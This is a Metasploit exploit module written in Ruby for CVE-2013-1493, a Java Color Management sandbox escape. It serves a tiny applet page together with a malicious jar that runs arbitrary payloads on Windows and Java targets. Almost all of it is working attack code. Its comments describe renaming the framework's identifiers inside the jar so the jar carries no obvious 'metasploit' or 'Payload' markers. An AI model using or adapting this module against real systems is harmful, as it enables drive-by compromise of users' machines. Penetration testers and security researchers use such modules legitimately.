##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
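# Framework core (exploit base classes, mixins) and Rex (rand_text_alpha,
# jar/zip builders). Typographic quotes in the pasted copy made these lines
# a syntax error; they are plain ASCII single quotes here.
require 'msf/core'
require 'rex'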
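class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  # Not called directly in this module; included for the native Windows x86
  # target so the framework can hand a non-Java payload to the jar builder.
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The landing page is a bare <applet> tag, so Browser Autopwn can fire this
  # module without any JavaScript support on the victim side.
  autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # The pasted copy had this key stranded inside on_request_uri; it belongs
      # in the module info. Index 1 = the native Windows x86 target.
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four pre-compiled exploit classes once, before the HTTP server
  # starts, and randomises the entry-point class name so the served jar does
  # not carry the well-known "Init" identifier.
  #
  # Raises Errno::ENOENT if data/exploits/cve-2013-1493 is missing; failing
  # here is preferable to serving a jar that cannot trigger the bug.
  def setup
    @init_class           = load_exploit_class("Init.class")
    @leak_class           = load_exploit_class("Leak.class")
    @buffered_image_class = load_exploit_class("MyBufferedImage.class")
    @color_space_class    = load_exploit_class("MyColorSpace.class")

    # Must be exactly as long as "Init": the class bytes are patched with a
    # plain gsub, and a different length would corrupt the length-prefixed
    # string entries in the class file that reference the class name.
    # Note that every case-sensitive occurrence of "Init" in the file is
    # rewritten, not only the class-name entry.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # HTTP dispatcher for the attacker-side server.
  #
  # * +.../*.jar+  -> the payload jar with the exploit classes added
  # * +.../+       -> the landing page that embeds the applet
  # * anything else -> redirect to the resource root
  #
  # +request.uri+ comes from the victim's browser; it is only pattern-matched
  # and echoed to the console, never used to build a path or a command.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      # A payload that cannot be packaged as a jar would otherwise blow up on
      # add_file with a NoMethodError on nil.
      unless jar
        print_error("Failed to build the payload jar.")
        send_not_found(cli)
        return
      end

      jar.add_file("#{@init_class_name}.class", @init_class)
      # Leak/MyBufferedImage/MyColorSpace keep their original names; they are
      # a static fingerprint of this module inside the served jar.
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the framework's well-known identifiers in entry names and
      # entry contents with same-length random strings: offsets inside the
      # class files stay valid, and the jar no longer carries obvious
      # "metasploit" / "Payload" markers.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str    = rand_text_alpha("payload".length)
      jar.entries.each do |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      end
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Kept in a differently named local on purpose: a local called
      # +payload+ would shadow the +payload+ method for the rest of the body.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal landing page: a 1x1 <applet> whose archive is a randomly named
  # jar (any name ending in .jar is served by on_request_uri) and whose code
  # attribute is the randomised entry class. No JavaScript is emitted.
  def generate_html
    jar_name = "#{rand_text_alpha(8)}.jar"

    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{jar_name}" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Reads one pre-compiled class file from data/exploits/cve-2013-1493 as
  # raw bytes (binary mode, so no newline or encoding conversion is applied).
  def load_exploit_class(name)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", name)
    File.binread(path)
  end

end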